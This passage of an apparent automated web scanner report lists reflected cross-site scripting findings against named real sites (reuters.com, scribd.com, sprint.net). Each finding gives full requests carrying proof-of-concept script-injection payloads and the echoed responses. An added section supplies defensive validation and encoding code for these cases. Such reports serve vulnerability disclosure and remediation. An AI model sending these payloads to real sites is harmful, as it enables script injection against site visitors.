Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Sat, 04-Sep-2010 01:03:40 GMT; path=/
Set-Cookie: kohanasession=lbcsf8itchvlv8shikh8vhsdd6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=byTxifj9sEuzmxkMB8HE9YLK6MkctiF77DZp6uQNjjPv8OHj9z3%2BTnkuRPNaIkM1Y9s1dqvSPGjs%2Bl90USsr7gr2FyFio9LpVYl5Y8nEt6peSvTt0E3QrkSbCp2vOGTii43s1DJ8pYmHK0KAyzjjo8VYWSqpNRlRCPmC7U8XtLZxuyGorYN34pUhKXPsOsNPZeszXIuXuTEpTAANTbLF8jSJ381L%2Bm818ESSYQp7PoBNsFAzcfs5c2%2Bv%2Bcv289Y0SbCOt8RtoliIrBcO4k4K6Gpekg0mtI9J5xTagcGLjR4SVdCtabQkmnKxH4mRUA%2FLSSFn5%2BXFADxk6pFLiNQHeuHamh7A28%2Bups3KhR9eXN0UJv1LnAAc; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12587

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:42 +0000","tot
...[SNIP]...

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c07"><script>alert(1)</script>e18cfb78b21 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4900

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF26 <![endif]-->
<!--[if !IE]> token: 892733d4-f219-4aaf-a26f-4ff2daae13fd <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21" />
...[SNIP]...

5.77. http://www.reuters.com/assets/commentsChild [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de11a"><script>alert(1)</script>663f7664906 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNewsde11a"><script>alert(1)</script>663f7664906&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5213

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF13 <![endif]-->
<!--[if !IE]> token: 07237ae1-8f58-470a-bbcb-d116e1992d4f <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsde11a"><script>alert(1)</script>663f7664906" />
...[SNIP]...

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e58d'%3balert(1)//87be1ff7cb was submitted in the &flashPath parameter. This input was echoed as 6e58d';alert(1)//87be1ff7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D16e58d'%3balert(1)//87be1ff7cb&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:24 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10745

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF31 <![endif]-->
<!--[if !IE]> token: 75d68b0e-7e26-420d-a60c-5ba564f496b3 <
...[SNIP]...
ockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=16e58d';alert(1)//87be1ff7cb',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
           'align', 'middle',
           'wmode', 'transparent',
           'id', 'flash',
           'bgcolor', '#ffffff',
           'name', '
...[SNIP]...

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into an HTML comment. The payload a467f--><script>alert(1)</script>ce7cfc0e2c5 was submitted in the &flashPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1a467f--><script>alert(1)</script>ce7cfc0e2c5&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:28 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10796

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> token: 8b34b729-2f70-45ff-ba51-15184d439003 <
...[SNIP]...
<!-- http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1a467f--><script>alert(1)</script>ce7cfc0e2c5 -->
...[SNIP]...

5.80. http://www.reuters.com/assets/newsFlash [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669f1'%3balert(1)//52a8ec3cf2b was submitted in the h parameter. This input was echoed as 669f1';alert(1)//52a8ec3cf2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90669f1'%3balert(1)//52a8ec3cf2b&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:52 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> token: e8324ba3-74c3-4fec-b687-322963413326 <
...[SNIP]...

   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90669f1';alert(1)//52a8ec3cf2b',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashpla
...[SNIP]...
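Findings 5.68, 5.69, 5.76 and 5.77 reflect input into a double-quoted HTML attribute, 5.78, 5.80 and 5.81 into a single-quoted JavaScript string literal, and 5.79 into an HTML comment; each context needs its own encoder, and the numeric parameters (w, h) and identifier-shaped ones (articleId, channel) are better rejected up front than encoded. The following is an added example written for this page, not code from the report or from reuters.com or mookie1.com; the function names, the allow-list rules and the demo strings are assumptions. It runs the report's own payloads through validate-then-encode for each of the three contexts.

```javascript
// Added example (not code from the report or from reuters.com / mookie1.com):
// validate-then-encode for the three reflection contexts in 5.68-5.81.
// Parameter names and rules below are assumptions made for the demo.

// Allow-list rules for the parameters these findings reflect. Rejecting
// bad input first means the encoders only ever see expected shapes.
const PARAM_RULES = {
  w: /^\d{1,4}$/,                // 5.81: pixel width
  h: /^\d{1,4}$/,                // 5.80: pixel height
  articleId: /^[A-Z0-9]{1,32}$/, // 5.76: e.g. USTRE78222D20110904
  channel: /^[A-Za-z]{1,32}$/,   // 5.77: e.g. domesticNews
};

function validateParam(name, value) {
  const rule = PARAM_RULES[name];
  if (!rule || typeof value !== 'string' || !rule.test(value)) {
    throw new Error('rejected value for parameter ' + name);
  }
  return value;
}

// HTML attribute context (5.68, 5.69, 5.76, 5.77): entity-encode the
// characters that can end a quoted attribute or open a new tag.
function encodeForHtmlAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context (5.78, 5.80, 5.81): hex-escape every
// character outside [A-Za-z0-9] so ' ; ( ) and // cannot end the literal.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// HTML comment context (5.79): no encoding makes a comment safe, so strip
// the sequences that can close it ('--', '>') and, better, do not echo
// user input into comments at all.
function sanitizeForHtmlComment(s) {
  return String(s).replace(/-{2,}/g, '-').replace(/[<>]/g, '');
}

// The hidden inputs from 5.76 / 5.77, rendered with attribute encoding.
function renderHiddenInput(name, value) {
  return '<input type="hidden" name="' + encodeForHtmlAttribute(name) +
         '" value="' + encodeForHtmlAttribute(value) + '" />';
}

// The width/height arguments of the AC_FL_RunContent call from 5.80 / 5.81:
// both must pass the numeric allow-list and are then JS-string encoded.
function renderFlashSizeArgs(params) {
  const w = validateParam('w', params.w);
  const h = validateParam('h', params.h);
  return "'width', '" + encodeForJsString(w) + "', 'height', '" +
         encodeForJsString(h) + "'";
}

// Demo with the report's payloads (strings constructed here):
console.log(renderHiddenInput('article_id',
  'USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21'));
console.log(encodeForJsString("90669f1';alert(1)//52a8ec3cf2b"));
console.log(sanitizeForHtmlComment('1a467f--><script>alert(1)</script>ce7cfc0e2c5'));
```

The order matters: `validateParam` would already have stopped the `h` and `w` payloads, and the encoder is the second line of defence for values such as a headline that cannot be reduced to an allow-list. `encodeForJsString` escapes more than strictly necessary on purpose; the cost is a few extra bytes, the benefit is that it is correct inside either quote style.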

5.81. http://www.reuters.com/assets/newsFlash [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783fd'%3balert(1)//f2696c00016 was submitted in the w parameter. This input was echoed as 783fd';alert(1)//f2696c00016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728783fd'%3balert(1)//f2696c00016&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:45 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF25 <![endif]-->
<!--[if !IE]> token: b80bcee9-8c35-4d7a-945c-b4822a95f4d5 <
...[SNIP]...
ML output folder.");
   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728783fd';alert(1)//f2696c00016',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedi
...[SNIP]...

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload ae54f<script>alert(1)</script>793ad682c63 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=ae54f<script>alert(1)</script>793ad682c63 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:04:47 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 553

<!--[if !IE]> This has NOT been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF08 <![endif]-->
<!--[if !IE]> token: 4baec32d-d2a8-4ee9-bf4a-c3739e992737 <
...[SNIP]...
<div class="searchTerm">"ae54f<script>alert(1)</script>793ad682c63"</div>
...[SNIP]...

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scribd.com
Path:   /embeds/63688924/content

Issue detail

The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf51</script><script>alert(1)</script>3cb4a3abca9 was submitted in the start_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embeds/63688924/content?start_page=14bf51</script><script>alert(1)</script>3cb4a3abca9&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 48ms
Status: 200 OK
X-Cache: MISS from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:57 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<script type="text/javascript">window.manager = new Scribd.Embeds.Content({"branded_logo":null,"page_count":5,"start_page":"14bf51</script><script>alert(1)</script>3cb4a3abca9","view_mode":"scroll","from_jsapi":false,"document":{"num_pages":5,"title":"Summary of State Collective Bargaining Agreements ","id":63688924}});</script>
...[SNIP]...

5.84. https://www.sprint.net/min/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e50"><script>alert(1)</script>d3106908dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /min27e50"><script>alert(1)</script>d3106908dc/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:41 GMT
